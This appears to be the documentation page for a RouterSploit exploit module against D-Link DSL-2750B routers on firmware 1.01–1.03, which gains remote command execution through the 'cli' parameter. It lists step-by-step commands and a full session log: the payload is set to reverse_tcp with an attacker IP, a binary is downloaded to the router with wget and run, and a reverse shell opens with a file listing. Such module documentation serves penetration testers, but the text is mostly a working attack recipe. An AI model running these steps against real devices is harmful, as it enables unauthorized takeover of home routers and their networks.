dsl_2750b_rce.md 2.96 KB

Description

This module exploits remote code execution vulnerability in D-Link DSL-2750B devices through "cli" parameter. Vulnerable firmwares are 1.01 up to 1.03.

Verification Steps

1. Start `./rsf.py`
2. Do: `use exploits/routers/dlink/dsl_2750b_rce`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.

6. Do: `set payload reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`
9. Payload is sent to device and executed providing attacker with the command shell.

Scenarios

rsf > use exploits/routers/dlink/dsl_2750b_rce
rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link DSL-2750B RCE) > run
[*] Running module...
[+] Target appears to be vulnerable

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > show payloads
[*] Available payloads:

   Payload         Name                   Description
   -------         ----                   -----------
   bind_tcp        MIPSBE Bind TCP        Creates interactive tcp bind shell for MIPSBE architecture.
   reverse_tcp     MIPSBE Reverse TCP     Creates interactive tcp reverse shell for MIPSBE architecture.

cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options

Payload Options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port


cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
lhost => 192.168.1.4
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:41933
[+] Enjoy your shell
ls -la
drwxrwxrwx   15 admin    root           224 Mar 11  2013 .
drwxrwxrwx   15 admin    root           224 Mar 11  2013 ..
drwxr-xr-x    2 admin    root          2554 Mar 11  2013 bin
drwxr-xr-x    2 admin    root             3 Mar 11  2013 data
drwxr-xr-x    4 admin    root          2482 Mar 11  2013 dev
drwxr-xr-x   12 admin    root           779 Mar 11  2013 etc
drwxr-xr-x    6 admin    root           690 Mar 11  2013 lib
lrwxrwxrwx    1 admin    root            11 Mar 11  2013 linuxrc -> bin/busybox
drwxr-xr-x    2 admin    root             0 Jan  1  1970 mnt
drwxr-xr-x    5 admin    root            56 Mar 11  2013 opt
dr-xr-xr-x   69 admin    root             0 Jan  1  1970 proc
drwxr-xr-x    2 admin    root           270 Mar 11  2013 sbin
drwxr-xr-x   11 admin    root             0 Jan  1  1970 sys
lrwxrwxrwx    1 admin    root             8 Mar 11  2013 tmp -> /var/tmp
drwxr-xr-x    4 admin    root            38 Mar 11  2013 usr
drwxr-xr-x   16 admin    root             0 Oct 19 20:36 var
drwxr-xr-x    5 admin    root          2801 Mar 11  2013 webs